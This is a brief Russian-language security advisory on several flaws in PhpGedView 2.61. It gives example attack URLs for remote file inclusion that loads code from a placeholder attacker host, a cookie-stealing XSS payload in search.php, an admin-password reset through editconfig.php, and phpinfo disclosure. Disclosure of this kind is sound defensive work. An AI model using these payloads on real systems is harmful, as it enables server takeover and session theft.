Дата публикации: | 09.01.2004 |
Всего просмотров: | 1512 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: PhpGedView 2.61
Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код команды операционной системы на целевой системе. Удаленный атакующий может выполнить XSS нападение. Несколько сценариев ('functions.php', 'authentication_index.php', и 'config_gedcom.php') не проверяют переменную "$PGV_BASE_DIRECTORY" перед включением файла. Пример: http://[target]/phpgedview_folder/authenti cation_index.php?PGV_BASE_DIRECTORY=http://[attacker]/ http://[target]/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker]/ http://[target]/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker]/Также сообщается, что файл 'editconfig.php' может использоваться удаленным пользователем для переустановки программного обеспечения и изменения пароля администратора: http://[target]/phpgedview_folder/editconfig.phpТакже сообщается, что файл 'search.php' не фильтрует HTML код в данных, представленных пользователем в 'firstname' переменной. Пример: http://localhost/phpgedview/search.php?action=soundex&firstname="><script >alert(document.cookie)</script>Также сообщается, что удаленный пользователь может определить информацию о конфигурации PHP на целевой системе, используя следующий URL: http://[target]/phpgedview_folder/admin.php?action=phpinfo URL производителя: http://phpgedview.sourceforge.net/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление см. в источнике сообщения. |
|
Ссылки: | Vuln in PHPGEDVIEW 2.61 Multi-Problem |